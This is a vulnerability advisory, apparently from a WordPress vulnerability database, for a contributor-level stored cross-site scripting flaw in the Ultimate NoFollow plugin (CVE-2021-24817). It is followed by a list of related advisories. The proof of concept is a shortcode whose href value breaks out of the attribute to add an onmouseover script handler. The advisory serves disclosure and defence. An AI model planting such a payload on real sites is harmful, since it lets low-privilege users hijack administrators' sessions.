Ultimate NoFollow <= 1.4.8 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24817 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the href attribute of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks

Proof of Concept

Affected shortcodes: nf, nofo, nofol, nofollow, relnofollow

As a contributor, put the below shortcode in a post/page
[nf href='https://test" style="position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px" onmouseover="alert(/XSS/)']test[/nf]

The XSS will be triggered when the post is previewed (for example by an admin when reviewed)/viewed

Affects Plugins

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Quentin VILLAIN (3wsec)

Submitter

Quentin VILLAIN (3wsec)

Submitter website

https://3wsec.fr

Verified

Yes

WPVDB ID

ccb27d2e-2d2a-40d3-ba7e-bcd5e5012a9a

Timeline

Publicly Published

2021-11-15 (about 4 years ago)

Added

2021-11-15 (about 4 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2024-06-06

Title

Idyllic < 1.1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2022-02-21

Title

Petfinder Listings < 1.1 - Admin+ Stored Cross-Site Scripting

Published

2022-02-03

Title

EasyJobs < 1.4.8 - Reflected Cross-Site Scripting

Published

2018-06-01

Title

wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Published

2016-04-12

Title

Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)